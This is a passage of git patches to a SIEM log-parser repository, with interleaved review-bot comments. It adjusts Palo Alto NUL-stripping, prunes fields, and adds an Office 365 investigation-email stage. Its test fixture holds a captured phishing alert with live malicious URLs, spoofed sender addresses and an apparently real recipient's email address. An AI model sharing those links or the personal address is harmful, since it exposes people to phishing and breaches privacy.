- paloalto.PanOSSDWANSite: "{{parsed_event.message.PanOSSDWANSite | replace('\x00', '')}}"
- paloalto.PanOSSessionStartTime: "{{parsed_event.message.PanOSSessionStartTime | replace('\x00', '')}}"
- paloalto.PanOSSourceDeviceHost: "{{parsed_event.message.PanOSSourceDeviceHost | replace('\x00', '')}}"
- paloalto.PanOSSourceDeviceModel: "{{parsed_event.message.PanOSSourceDeviceModel | replace('\x00', '')}}"
- paloalto.PanOSSourceDeviceProfile: "{{parsed_event.message.PanOSSourceDeviceProfile | replace('\x00', '')}}"
- paloalto.PanOSSourceDeviceVendor: "{{parsed_event.message.PanOSSourceDeviceVendor | replace('\x00', '')}}"
- paloalto.PanOSSourceDynamicAddressGroup: "{{parsed_event.message.PanOSSourceDynamicAddressGroup | replace('\x00', '')}}"
- paloalto.PanOSSourceEDL: "{{parsed_event.message.PanOSSourceEDL | replace('\x00', '')}}"
- paloalto.PanOSSourceLocation: "{{parsed_event.message.PanOSSourceLocation | replace('\x00', '')}}"
- paloalto.PanOSSourceUUID: "{{parsed_event.message.PanOSSourceUUID | replace('\x00', '')}}"
- paloalto.PanOSThreatCategory: "{{parsed_event.message.PanOSThreatCategory | replace('\x00', '')}}"
- paloalto.PanOSThreatID: "{{parsed_event.message.PanOSThreatID | replace('\x00', '')}}"
- paloalto.PanOSVirtualSystemName: "{{parsed_event.message.PanOSVirtualSystemName | replace('\x00', '')}}"
- paloalto.PanOSX-Forwarded-ForIP: "{{parsed_event.message['PanOSX-Forwarded-ForIP'] | replace('\x00', '')}}"
- paloalto.URLCategory: "{{parsed_event.message.URLCategory | replace('x00', '')}}"
- paloalto.VirtualLocation: "{{parsed_event.message.VirtualLocation | replace('x00', '')}}"
- paloalto.VirtualSystemID: "{{parsed_event.message.VirtualSystemID | replace('x00', '')}}"
- paloalto.VirtualSystemName: "{{parsed_event.message.VirtualSystemName | replace('x00', '')}}"
+ paloalto.ContentType: "{{parsed_event.message.ContentType | replace('\\x00', '')}}"
+ paloalto.DGHierarchyLevel1: "{{parsed_event.message.DGHierarchyLevel1 | replace('\\x00', '')}}"
+ paloalto.DGHierarchyLevel2: "{{parsed_event.message.DGHierarchyLevel2 | replace('\\x00', '')}}"
+ paloalto.DGHierarchyLevel3: "{{parsed_event.message.DGHierarchyLevel3 | replace('\\x00', '')}}"
+ paloalto.DGHierarchyLevel4: "{{parsed_event.message.DGHierarchyLevel4 | replace('\\x00', '')}}"
+ paloalto.DirectionOfAttack: "{{parsed_event.message.DirectionOfAttack | replace('\\x00', '')}}"
+ paloalto.EventID: "{{parsed_event.message.EventID | replace('\\x00', '')}}"
+ paloalto.PanOSContainerName: "{{parsed_event.message.PanOSContainerName | replace('\\x00', '')}}"
+ paloalto.PanOSContainerNameSpace: "{{parsed_event.message.PanOSContainerNameSpace | replace('\\x00', '')}}"
+ paloalto.PanOSDestinationDeviceCategory: "{{parsed_event.message.PanOSDestinationDeviceCategory | replace('\\x00', '')}}"
+ paloalto.PanOSDestinationDeviceHost: "{{parsed_event.message.PanOSDestinationDeviceHost | replace('\\x00', '')}}"
+ paloalto.PanOSDestinationDeviceMac: "{{parsed_event.message.PanOSDestinationDeviceMac | replace('\\x00', '')}}"
+ paloalto.PanOSDestinationDeviceModel: "{{parsed_event.message.PanOSDestinationDeviceModel | replace('\\x00', '')}}"
+ paloalto.PanOSDestinationDeviceOSFamily: "{{parsed_event.message.PanOSDestinationDeviceOSFamily | replace('\\x00', '')}}"
+ paloalto.PanOSDestinationDeviceOSVersion: "{{parsed_event.message.PanOSDestinationDeviceOSVersion | replace('\\x00', '')}}"
+ paloalto.PanOSDestinationDeviceProfile: "{{parsed_event.message.PanOSDestinationDeviceProfile | replace('\\x00', '')}}"
+ paloalto.PanOSDestinationDeviceVendor: "{{parsed_event.message.PanOSDestinationDeviceVendor | replace('\\x00', '')}}"
+ paloalto.PanOSDestinationEDL: "{{parsed_event.message.PanOSDestinationEDL | replace('\\x00', '')}}"
+ paloalto.PanOSDestinationUUID: "{{parsed_event.message.PanOSDestinationUUID | replace('\\x00', '')}}"
+ paloalto.PanOSEndpointSerialNumber: "{{parsed_event.message.PanOSEndpointSerialNumber | replace('\\x00', '')}}"
+ paloalto.PanOSGPHostID: "{{parsed_event.message.PanOSGPHostID | replace('\\x00', '')}}"
+ paloalto.PanOSHASessionOwner: "{{parsed_event.message.PanOSHASessionOwner | replace('\\x00', '')}}"
+ paloalto.PanOSQuarantineReason: "{{parsed_event.message.PanOSQuarantineReason | replace('\\x00', '')}}"
+ paloalto.PanOSSDWANCluster: "{{parsed_event.message.PanOSSDWANCluster | replace('\\x00', '')}}"
+ paloalto.PanOSSDWANClusterType: "{{parsed_event.message.PanOSSDWANClusterType | replace('\\x00', '')}}"
+ paloalto.PanOSSDWANDeviceType: "{{parsed_event.message.PanOSSDWANDeviceType | replace('\\x00', '')}}"
+ paloalto.PanOSSDWANPolicyName: "{{parsed_event.message.PanOSSDWANPolicyName | replace('\\x00', '')}}"
+ paloalto.PanOSSDWANSite: "{{parsed_event.message.PanOSSDWANSite | replace('\\x00', '')}}"
+ paloalto.PanOSSessionStartTime: "{{parsed_event.message.PanOSSessionStartTime | replace('\\x00', '')}}"
+ paloalto.PanOSSourceDeviceHost: "{{parsed_event.message.PanOSSourceDeviceHost | replace('\\x00', '')}}"
+ paloalto.PanOSSourceDeviceModel: "{{parsed_event.message.PanOSSourceDeviceModel | replace('\\x00', '')}}"
+ paloalto.PanOSSourceDeviceProfile: "{{parsed_event.message.PanOSSourceDeviceProfile | replace('\\x00', '')}}"
+ paloalto.PanOSSourceDeviceVendor: "{{parsed_event.message.PanOSSourceDeviceVendor | replace('\\x00', '')}}"
+ paloalto.PanOSSourceDynamicAddressGroup: "{{parsed_event.message.PanOSSourceDynamicAddressGroup | replace('\\x00', '')}}"
+ paloalto.PanOSSourceEDL: "{{parsed_event.message.PanOSSourceEDL | replace('\\x00', '')}}"
+ paloalto.PanOSSourceLocation: "{{parsed_event.message.PanOSSourceLocation | replace('\\x00', '')}}"
+ paloalto.PanOSSourceUUID: "{{parsed_event.message.PanOSSourceUUID | replace('\\x00', '')}}"
+ paloalto.PanOSThreatCategory: "{{parsed_event.message.PanOSThreatCategory | replace('\\x00', '')}}"
+ paloalto.PanOSThreatID: "{{parsed_event.message.PanOSThreatID | replace('\\x00', '')}}"
+ paloalto.PanOSVirtualSystemName: "{{parsed_event.message.PanOSVirtualSystemName | replace('\\x00', '')}}"
+ paloalto.PanOSX-Forwarded-ForIP: "{{parsed_event.message['PanOSX-Forwarded-ForIP'] | replace('\\x00', '')}}"
+ paloalto.URLCategory: "{{parsed_event.message.URLCategory | replace('\\x00', '')}}"
+ paloalto.VirtualLocation: "{{parsed_event.message.VirtualLocation | replace('\\x00', '')}}"
+ paloalto.VirtualSystemID: "{{parsed_event.message.VirtualSystemID | replace('\\x00', '')}}"
+ paloalto.VirtualSystemName: "{{parsed_event.message.VirtualSystemName | replace('\\x00', '')}}"
 paloalto.Threat_ContentType: "{{parsed_event.message.Subtype}}"
 paloalto.connection.stage: "{{parsed_event.message.Stage or parsed_event.message.PanOSStage}}"
 paloalto.authentication.method: "{{parsed_event.message.AuthMethod or parsed_event.message.PanOSAuthMethod}}"
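Review bot: Only the 45 `paloalto.*` keys in this `set` are stripped of NUL characters; the context lines in the same action (`user.name`, `user_agent.os.name`, `user_agent.os.version`) and `paloalto.Threat_ContentType` just below take the raw value, so if the padding comes from the transport rather than from specific fields it still lands in those keys, and a NUL surviving into `user.name` defeats exact-match detection rules on that field. Stripping it once on the raw message in an earlier stage (whose start is outside this hunk) would cover every field and remove the 45 repeated `| replace('\\x00', '')` pipes. The new form also depends on two decoding passes that are easy to undo by accident: the YAML double-quoted scalar turns `\\x00` into the four characters `\x00`, and Jinja's lexer then decodes that string literal into a real NUL, whereas the previous `\x00` was consumed by YAML itself. A one-line comment above the block would protect it, e.g. `# '\\x00' is intentional: YAML keeps the backslash, Jinja decodes it to NUL`.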
From fc7a4d495dc46b2bcc174788da81747895dc8649 Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Wed, 16 Oct 2024 16:56:22 +0200 Subject: [PATCH 157/317] fix(PaloAlto): prune unused fields --- .../paloalto-prisma-access/_meta/fields.yml | 10 ---------- 1 file changed, 10 deletions(-) diff --git a/Palo Alto Networks/paloalto-prisma-access/_meta/fields.yml b/Palo Alto Networks/paloalto-prisma-access/_meta/fields.yml index 7c526334c..6382be28b 100644 --- a/Palo Alto Networks/paloalto-prisma-access/_meta/fields.yml +++ b/Palo Alto Networks/paloalto-prisma-access/_meta/fields.yml @@ -13,11 +13,6 @@ email.to.address: name: email.to.address type: keyword -paloalto: - description: Root of paloalto custom fields - name: paloalto - type: dict - paloalto.ContentType: description: Paloalto content type name: paloalto.ContentType @@ -302,8 +297,3 @@ paloalto.threat.name: description: The name of the threat name: paloalto.threat.name type: keyword - -paloalto.threat.type: - description: The type of the threat - name: paloalto.threat.type - type: keyword From fc3ba061aa5131f8ba5e238d14aceb6f5b63943b Mon Sep 17 00:00:00 2001 From: LenaigKaliou Date: Wed, 16 Oct 2024 17:42:44 +0200 Subject: [PATCH 158/317] Fix on O365 : Added additional fields to the parser and fields.yml --- Office 365/o365/_meta/fields.yml | 5 +++ Office 365/o365/ingest/parser.yml | 23 ++++++++++ ...and_response_with_additional_fields_1.json | 45 +++++++++++++------ 3 files changed, 59 insertions(+), 14 deletions(-) diff --git a/Office 365/o365/_meta/fields.yml b/Office 365/o365/_meta/fields.yml index 838ce8899..96bb48e86 100644 --- a/Office 365/o365/_meta/fields.yml +++ b/Office 365/o365/_meta/fields.yml 
@@ -373,6 +373,11 @@ office365.investigation.email.urls: name: office365.investigation.email.urls type: array +office365.investigation.emails: + description: Several infos about emails + name: office365.investigation.emails + type: array + office365.investigation.id: description: Investigation id name: office365.investigation.id diff --git a/Office 365/o365/ingest/parser.yml b/Office 365/o365/ingest/parser.yml index 8574ca376..90f07c4ca 100644 --- a/Office 365/o365/ingest/parser.yml +++ b/Office 365/o365/ingest/parser.yml 
@@ -486,6 +486,29 @@ stages: - set: event.kind: '{% if parse_data.ParsedData.IsIncident %}{{"alert"}}{% else %}{{"event"}}{% endif %}' + - set: + office365.investigation.emails: > + [ + {%- for action in json_event.message.Actions | map("from_json") -%} + {%- for entity in action.Entities -%} + { + {%- if entity.AntispamDirection != null -%}"direction": "{{entity.AntispamDirection}}",{%- endif -%} + {%- if entity.NetworkMessageIds != null -%}"message_ids": "{{entity.NetworkMessageIds}}",{%- endif -%} + {%- if entity.NetworkMessageId != null -%}"message_ids": ["{{entity.NetworkMessageId}}"],{%- endif -%} + {%- if entity.Language != null -%}"language": "{{entity.Language}}",{%- endif -%} + {%- if entity.DeliveryAction != null or entity.DeliveryLocation != null or entity.OriginalDeliveryLocation != null -%} + "delivery": { + {%- if entity.DeliveryAction!= null -%}"action": "{{entity.DeliveryAction}}",{%- endif -%} + {%- if entity.DeliveryLocation != null -%}"location": "{{entity.DeliveryLocation}}",{%- endif -%} + {%- if entity.OriginalDeliveryLocation -%}"original_location": "{{entity.OriginalDeliveryLocation}}",{%- endif -%} + }, + {%- endif -%} + }, + {%- endfor -%} + {%- endfor -%} + ] + filter: '{{json_event.message.get("Actions") != None and json_event.message.Actions | map("from_json") | rejectattr("Entities") | list | length != json_event.message.Actions | list | length}}' + - set: office365.investigation.email.urls: '[{% for Property in parse_data.ParsedData.Entities %}{% for Url in Property.Urls %} "{{Url}}", {% endfor %}{% endfor %}]' office365.investigation.email.sender.ip: > diff --git a/Office 365/o365/tests/automated_investigation_and_response_with_additional_fields_1.json b/Office 365/o365/tests/automated_investigation_and_response_with_additional_fields_1.json index 28557157c..d1b102ddf 100644 --- a/Office 365/o365/tests/automated_investigation_and_response_with_additional_fields_1.json 
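Review bot: `message_ids` is emitted from two branches with different shapes, and both can fire for the same entity: `"message_ids": "{{entity.NetworkMessageIds}}"` renders the value as one quoted string (a list source becomes the text `['a', 'b']`), the `NetworkMessageId` branch emits a JSON array, and when both source keys are present the object carries a duplicate key whose winner depends on the consumer. Every value is also interpolated unescaped into hand-built JSON, so a `DeliveryLocation`, `Language` or direction value containing `"` or a backslash breaks the whole array; Jinja's builtin `tojson` filter quotes and escapes each value and settles both problems (if `NetworkMessageIds` can be a scalar, wrap it in `[...]` like the other branch; its type is not visible here). Two consistency points: `entity.OriginalDeliveryLocation` is tested for truthiness while its siblings use `!= null`, and `{% for entity in action.Entities %}` raises if an action carries `Entities: null` (a missing key iterates as empty, an explicit null does not), which `action.Entities or []` avoids. The trailing commas before `}` and `]` follow the existing `email.urls` line, so I assume the engine tolerates them.
```yaml
            {%- for entity in action.Entities or [] -%}
            {
              {%- if entity.AntispamDirection != null -%}"direction": {{ entity.AntispamDirection | tojson }},{%- endif -%}
              {%- if entity.NetworkMessageIds != null -%}"message_ids": {{ entity.NetworkMessageIds | tojson }},
              {%- elif entity.NetworkMessageId != null -%}"message_ids": [{{ entity.NetworkMessageId | tojson }}],{%- endif -%}
              {%- if entity.Language != null -%}"language": {{ entity.Language | tojson }},{%- endif -%}
              {# … unchanged: delivery sub-object, with each value passed through | tojson and OriginalDeliveryLocation tested with != null … #}
            },
```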
+++ b/Office 365/o365/tests/automated_investigation_and_response_with_additional_fields_1.json 
@@ -1,9 +1,9 @@ { "input": { - "message": "{\"CreationTime\":\"2024-09-02T03:33:37\",\"Id\":\"8217bd67-1368-4213-b6be-498cdbff1542\",\"Operation\":\"AirInvestigationData\",\"OrganizationId\":\"275ae857-f201-4a2e-8f43-d48391c56871\",\"RecordType\":64,\"UserKey\":\"AirInvestigation\",\"UserType\":4,\"Version\":1,\"Workload\":\"AirInvestigation\",\"ObjectId\":\"8217bd67-1368-4213-b6be-498cdbff1542\",\"UserId\":\"AirInvestigation\",\"Actions\":[\"{\\\"$id\\\":\\\"1\\\",\\\"ActionId\\\":\\\"urn:EmailZapper:48971b6852ea31ff93989b88b832bca5\\\",\\\"InvestigationId\\\":\\\"urn:ZappedUrlInvestigation:c85d59e9ff9d6393504a822ac49176c8\\\",\\\"ActionApproval\\\":\\\"None\\\",\\\"ActionType\\\":\\\"EmailRemediation\\\",\\\"ActionStatus\\\":\\\"Pending\\\",\\\"Entities\\\":[{\\\"$id\\\":\\\"2\\\",\\\"Recipient\\\":\\\"ggravier@ixina.com\\\",\\\"Urls\\\":[\\\"https://zpr.io/TUZAu6VrAvQT\\\",\\\"https://zupimages.net/up/24/35/1itk.png\\\"],\\\"Threats\\\":[\\\"ZapPhish\\\",\\\"NormalPhish\\\"],\\\"Sender\\\":\\\"support.33@wdezd.ersdz.meradebo.com\\\",\\\"P1Sender\\\":\\\"okhmqyjdcdn.bfwmwyytludfovodgfouzyeg@wdezd.ersdz.meradebo.com\\\",\\\"P1SenderDomain\\\":\\\"wdezd.ersdz.meradebo.com\\\",\\\"SenderIP\\\":\\\"40.107.244.101\\\",\\\"P2Sender\\\":\\\"support.33@wdezd.ersdz.meradebo.com\\\",\\\"P2SenderDisplayName\\\":\\\"Tractor Supply\\\",\\\"P2SenderDomain\\\":\\\"wdezd.ersdz.meradebo.com\\\",\\\"ReceivedDate\\\":\\\"2024-09-02T02:43:12\\\",\\\"NetworkMessageId\\\":\\\"ee73bbc9-c170-438a-82eb-08dccaf8fa4f\\\",\\\"InternetMessageId\\\":\\\"\\\",\\\"Subject\\\":\\\"\ud835\ude7c\ud835\ude92\ud835\ude95\ud835\udea0\ud835\ude8a\ud835\ude9e\ud835\ude94\ud835\ude8e\ud835\ude8e \ud835\ude72\ud835\ude98\ud835\ude9b\ud835\ude8d\ud835\ude95\ud835\ude8e\ud835\ude9c\ud835\ude9c \ud835\ude7f\ud835\ude98\ud835\udea0\ud835\ude8e\ud835\ude9b \ud835\ude83\ud835\ude98\ud835\ude98\ud835\ude95 \ud835\ude82\ud835\ude8e\ud835\ude9d 
\ud835\ude86\ud835\ude92\ud835\ude97\ud835\ude97\ud835\ude8e\ud835\ude9b\\\",\\\"AntispamDirection\\\":\\\"Inbound\\\",\\\"DeliveryAction\\\":\\\"DeliveredAsSpam\\\",\\\"ThreatDetectionMethods\\\":[\\\"FingerPrintMatch\\\"],\\\"Language\\\":\\\"en\\\",\\\"DeliveryLocation\\\":\\\"JunkFolder\\\",\\\"OriginalDeliveryLocation\\\":\\\"Inbox\\\",\\\"AdditionalActionsAndResults\\\":[\\\"OriginalDelivery: [N/A]\\\",\\\"Zap: [Success: Message moved]\\\"],\\\"AuthDetails\\\":[{\\\"Name\\\":\\\"SPF\\\",\\\"Value\\\":\\\"Pass\\\"},{\\\"Name\\\":\\\"DKIM\\\",\\\"Value\\\":\\\"None\\\"},{\\\"Name\\\":\\\"DMARC\\\",\\\"Value\\\":\\\"Best guess pass\\\"},{\\\"Name\\\":\\\"Comp Auth\\\",\\\"Value\\\":\\\"pass\\\"}],\\\"SystemOverrides\\\":[],\\\"Type\\\":\\\"mailMessage\\\",\\\"Urn\\\":\\\"urn:MailEntity:98fed74e812bdb3dd6241259c9afe88d\\\",\\\"Source\\\":\\\"OATP\\\",\\\"FirstSeen\\\":\\\"2024-09-02T03:20:40\\\"}],\\\"RelatedAlertIds\\\":[\\\"76572799-59c1-0221-8c00-08dccafd4a30\\\"],\\\"StartTimeUtc\\\":\\\"2024-09-02T03:27:33\\\",\\\"LastUpdateTimeUtc\\\":\\\"2024-09-02T03:33:31.8137435Z\\\",\\\"TimestampUtc\\\":\\\"2024-09-02T03:27:33\\\",\\\"BulkName\\\":\\\"Mail with malicious urls is zapped - urn:ZappedUrlInvestigation:c85d59e9ff9d6393504a822ac49176c8\\\",\\\"ResourceIdentifiers\\\":[{\\\"$id\\\":\\\"3\\\",\\\"AadTenantId\\\":\\\"275ae857-f201-4a2e-8f43-d48391c56871\\\",\\\"Type\\\":\\\"AAD\\\"}],\\\"PendingType\\\":\\\"User\\\",\\\"LogCreationTime\\\":\\\"2024-09-02T03:33:31.8137435Z\\\",\\\"MachineName\\\":\\\"AM7EUR03BG406\\\",\\\"Description\\\":\\\"For malicious emails, you can move to junk, soft or hard delete from user's 
mailbox.\\\"}\",\"{\\\"$id\\\":\\\"1\\\",\\\"ActionId\\\":\\\"urn:EmailZapper:780880f2766afe9e0a18e7c6fa676ee2\\\",\\\"InvestigationId\\\":\\\"urn:ZappedUrlInvestigation:c85d59e9ff9d6393504a822ac49176c8\\\",\\\"ActionApproval\\\":\\\"None\\\",\\\"ActionType\\\":\\\"EmailRemediation\\\",\\\"ActionStatus\\\":\\\"Pending\\\",\\\"Entities\\\":[{\\\"$id\\\":\\\"2\\\",\\\"NetworkMessageIds\\\":[\\\"41e9cae8-deaa-4d89-6036-08dccaf8db1a\\\",\\\"2019a522-c814-4cd0-b23d-08dccaf8cc37\\\",\\\"ee73bbc9-c170-438a-82eb-08dccaf8fa4f\\\",\\\"02c4a467-76c0-4491-737f-08dccaf8d47c\\\",\\\"26c865c1-2187-469c-5c0c-08dccaf8dca1\\\",\\\"c4ccc77c-0004-4c60-5f7d-08dccaf8d5b1\\\",\\\"5f3c47d0-051b-4439-8235-08dccaf8d27a\\\",\\\"1035a7d2-723e-4e0b-9b50-08dccaf8cf41\\\",\\\"1a8a159c-6655-45c4-8eef-08dccaf8d0e7\\\",\\\"1106f7ec-3c1f-45f6-2640-08dccaf90045\\\"],\\\"CountByThreatType\\\":{\\\"HighConfPhish\\\":0,\\\"Phish\\\":6,\\\"Malware\\\":0,\\\"Spam\\\":6,\\\"MaliciousUrl\\\":12},\\\"CountByProtectionStatus\\\":{\\\"DeliveredAsSpam\\\":6,\\\"Delivered\\\":4,\\\"Blocked\\\":2},\\\"CountByDeliveryLocation\\\":{\\\"JunkFolder\\\":6,\\\"External\\\":3,\\\"Failed\\\":2,\\\"Forwarded\\\":1},\\\"Query\\\":\\\"( ((NormalizedUrl:\\\\\\\"https://zpr.io/TUZAu6VrAvQT\\\\\\\") AND (ContentType: 1)) AND NOT(XmiInfoTenantPolicyFinalVerdictSource:PhishEdu) AND NOT(XmiInfoTenantPolicyFinalVerdictSource:SecOps))\\\",\\\"QueryTime\\\":\\\"2024-09-02T03:24:59.7851632Z\\\",\\\"MailCount\\\":12,\\\"IsVolumeAnamoly\\\":true,\\\"ClusterSourceIdentifier\\\":\\\"https://zpr.io/TUZAu6VrAvQT\\\",\\\"ClusterSourceType\\\":\\\"UrlThreatIndicator\\\",\\\"ClusterQueryStartTime\\\":\\\"2024-08-13T00:00:00Z\\\",\\\"ClusterQueryEndTime\\\":\\\"2024-09-02T03:24:59.7851632Z\\\",\\\"ClusterGroup\\\":\\\"UrlThreatIdentifier\\\",\\\"Type\\\":\\\"mailCluster\\\",\\\"ClusterBy\\\":\\\"NormalizedUrl;ContentType\\\",\\\"ClusterByValue\\\":\\\"https://zpr.io/TUZAu6VrAvQT;1\\\",\\\"QueryStartTime\\\":\\\"8/13/2024 12:00:00 
AM\\\",\\\"QueryTime\\\":\\\"9/2/2024 3:24:59 AM\\\",\\\"Urn\\\":\\\"urn:MailClusterEntity:b2738e6d2385fbb888114d4d12dbb665\\\",\\\"Source\\\":\\\"OATP\\\",\\\"FirstSeen\\\":\\\"2024-09-02T03:25:01\\\"}],\\\"RelatedAlertIds\\\":[\\\"76572799-59c1-0221-8c00-08dccafd4a30\\\"],\\\"StartTimeUtc\\\":\\\"2024-09-02T03:27:33\\\",\\\"LastUpdateTimeUtc\\\":\\\"2024-09-02T03:33:31.8137435Z\\\",\\\"TimestampUtc\\\":\\\"2024-09-02T03:27:33\\\",\\\"BulkName\\\":\\\"Mail with malicious urls is zapped - urn:ZappedUrlInvestigation:c85d59e9ff9d6393504a822ac49176c8\\\",\\\"ResourceIdentifiers\\\":[{\\\"$id\\\":\\\"3\\\",\\\"AadTenantId\\\":\\\"275ae857-f201-4a2e-8f43-d48391c56871\\\",\\\"Type\\\":\\\"AAD\\\"}],\\\"PendingType\\\":\\\"User\\\",\\\"LogCreationTime\\\":\\\"2024-09-02T03:33:31.8137435Z\\\",\\\"MachineName\\\":\\\"AM7EUR03BG406\\\",\\\"Description\\\":\\\"For malicious emails, you can move to junk, soft or hard delete from user's mailbox.\\\"}\"],\"Data\":\"{\\\"Version\\\":\\\"3.0\\\",\\\"VendorName\\\":\\\"Microsoft\\\",\\\"ProviderName\\\":\\\"OATP\\\",\\\"AlertType\\\":\\\"8e6ba277-ef39-404e-aaf1-294f6d9a2b88\\\",\\\"StartTimeUtc\\\":\\\"2024-09-02T03:14:37.3349438Z\\\",\\\"EndTimeUtc\\\":\\\"2024-09-02T03:14:37.3349438Z\\\",\\\"TimeGenerated\\\":\\\"2024-09-02T03:16:43.91Z\\\",\\\"ProcessingEndTime\\\":\\\"2024-09-02T03:33:31.8137435Z\\\",\\\"Status\\\":\\\"InProgress\\\",\\\"DetectionTechnology\\\":\\\"URLList\\\",\\\"Severity\\\":\\\"Informational\\\",\\\"ConfidenceLevel\\\":\\\"Unknown\\\",\\\"ConfidenceScore\\\":1.0,\\\"IsIncident\\\":false,\\\"ProviderAlertId\\\":\\\"76572799-59c1-0221-8c00-08dccafd4a30\\\",\\\"SystemAlertId\\\":null,\\\"CorrelationKey\\\":\\\"8a5bf71a-d9e4-422e-8bdb-33272de66983\\\",\\\"Investigations\\\":[{\\\"$id\\\":\\\"1\\\",\\\"Id\\\":\\\"urn:ZappedUrlInvestigation:c85d59e9ff9d6393504a822ac49176c8\\\",\\\"InvestigationStatus\\\":\\\"Pending\\\"}],\\\"InvestigationIds\\\":[\\\"urn:ZappedUrlInvestigation:c85d59e9ff9d6393504a822ac49176c8\\\"]
,\\\"Intent\\\":\\\"Probing\\\",\\\"ResourceIdentifiers\\\":[{\\\"$id\\\":\\\"2\\\",\\\"AadTenantId\\\":\\\"275ae857-f201-4a2e-8f43-d48391c56871\\\",\\\"Type\\\":\\\"AAD\\\"}],\\\"AzureResourceId\\\":null,\\\"WorkspaceId\\\":null,\\\"WorkspaceSubscriptionId\\\":null,\\\"WorkspaceResourceGroup\\\":null,\\\"AgentId\\\":null,\\\"AlertDisplayName\\\":\\\"Email messages containing malicious URL removed after delivery\u200b\\\",\\\"Description\\\":\\\"Emails with malicious URL that were delivered and later removed -V1.0.0.3\\\",\\\"ExtendedLinks\\\":[{\\\"Href\\\":\\\"https://security.microsoft.com/alerts/fa76572799-59c1-0221-8c00-08dccafd4a30\\\",\\\"Category\\\":null,\\\"Label\\\":\\\"alert\\\",\\\"Type\\\":\\\"webLink\\\"}],\\\"Metadata\\\":{\\\"CustomApps\\\":null,\\\"GenericInfo\\\":null},\\\"Entities\\\":[{\\\"$id\\\":\\\"3\\\",\\\"Recipient\\\":\\\"ggravier@ixina.com\\\",\\\"Urls\\\":[\\\"https://zpr.io/TUZAu6VrAvQT\\\",\\\"https://zupimages.net/up/24/35/1itk.png\\\"],\\\"Threats\\\":[\\\"ZapPhish\\\",\\\"NormalPhish\\\"],\\\"Sender\\\":\\\"support.33@wdezd.ersdz.meradebo.com\\\",\\\"P1Sender\\\":\\\"okhmqyjdcdn.bfwmwyytludfovodgfouzyeg@wdezd.ersdz.meradebo.com\\\",\\\"P1SenderDomain\\\":\\\"wdezd.ersdz.meradebo.com\\\",\\\"SenderIP\\\":\\\"40.107.244.101\\\",\\\"P2Sender\\\":\\\"support.33@wdezd.ersdz.meradebo.com\\\",\\\"P2SenderDisplayName\\\":\\\"Tractor Supply\\\",\\\"P2SenderDomain\\\":\\\"wdezd.ersdz.meradebo.com\\\",\\\"ReceivedDate\\\":\\\"2024-09-02T02:43:12\\\",\\\"NetworkMessageId\\\":\\\"ee73bbc9-c170-438a-82eb-08dccaf8fa4f\\\",\\\"InternetMessageId\\\":\\\"\\\",\\\"Subject\\\":\\\"\ud835\ude7c\ud835\ude92\ud835\ude95\ud835\udea0\ud835\ude8a\ud835\ude9e\ud835\ude94\ud835\ude8e\ud835\ude8e \ud835\ude72\ud835\ude98\ud835\ude9b\ud835\ude8d\ud835\ude95\ud835\ude8e\ud835\ude9c\ud835\ude9c \ud835\ude7f\ud835\ude98\ud835\udea0\ud835\ude8e\ud835\ude9b \ud835\ude83\ud835\ude98\ud835\ude98\ud835\ude95 \ud835\ude82\ud835\ude8e\ud835\ude9d 
\ud835\ude86\ud835\ude92\ud835\ude97\ud835\ude97\ud835\ude8e\ud835\ude9b\\\",\\\"AntispamDirection\\\":\\\"Inbound\\\",\\\"DeliveryAction\\\":\\\"DeliveredAsSpam\\\",\\\"ThreatDetectionMethods\\\":[\\\"FingerPrintMatch\\\"],\\\"Language\\\":\\\"en\\\",\\\"DeliveryLocation\\\":\\\"JunkFolder\\\",\\\"OriginalDeliveryLocation\\\":\\\"Inbox\\\",\\\"AdditionalActionsAndResults\\\":[\\\"OriginalDelivery: [N/A]\\\",\\\"Zap: [Success: Message moved]\\\"],\\\"AuthDetails\\\":[{\\\"Name\\\":\\\"SPF\\\",\\\"Value\\\":\\\"Pass\\\"},{\\\"Name\\\":\\\"DKIM\\\",\\\"Value\\\":\\\"None\\\"},{\\\"Name\\\":\\\"DMARC\\\",\\\"Value\\\":\\\"Best guess pass\\\"},{\\\"Name\\\":\\\"Comp Auth\\\",\\\"Value\\\":\\\"pass\\\"}],\\\"SystemOverrides\\\":[],\\\"Type\\\":\\\"mailMessage\\\",\\\"Urn\\\":\\\"urn:MailEntity:98fed74e812bdb3dd6241259c9afe88d\\\",\\\"Source\\\":\\\"OATP\\\",\\\"FirstSeen\\\":\\\"2024-09-02T03:20:40\\\"},{\\\"$id\\\":\\\"4\\\",\\\"MailboxPrimaryAddress\\\":\\\"ggravier@ixina.com\\\",\\\"Upn\\\":\\\"ggravier@ixina.com\\\",\\\"AadId\\\":\\\"3339ab32-9c9a-4dab-a67b-d9316a37b2d3\\\",\\\"RiskLevel\\\":\\\"None\\\",\\\"Type\\\":\\\"mailbox\\\",\\\"Urn\\\":\\\"urn:UserEntity:9b5a6776b9acaade0704a7a3ed836036\\\",\\\"Source\\\":\\\"OATP\\\",\\\"FirstSeen\\\":\\\"2024-09-02T03:20:40\\\"},{\\\"$id\\\":\\\"5\\\",\\\"Url\\\":\\\"https://zpr.io/TUZAu6VrAvQT\\\",\\\"Type\\\":\\\"url\\\",\\\"ClickCount\\\":0,\\\"EmailCount\\\":12,\\\"Urn\\\":\\\"urn:UrlEntity:0436a04039e1a1bd9af706cbef1a6b7a\\\",\\\"Source\\\":\\\"OATP\\\",\\\"FirstSeen\\\":\\\"2024-09-02T03:20:40\\\"},{\\\"$id\\\":\\\"6\\\",\\\"NetworkMessageIds\\\":[\\\"ee73bbc9-c170-438a-82eb-08dccaf8fa4f\\\"],\\\"CountByThreatType\\\":{\\\"HighConfPhish\\\":0,\\\"Phish\\\":1,\\\"Malware\\\":0,\\\"Spam\\\":1},\\\"CountByProtectionStatus\\\":{\\\"DeliveredAsSpam\\\":1},\\\"CountByDeliveryLocation\\\":{\\\"JunkFolder\\\":1},\\\"Query\\\":\\\"( (( 
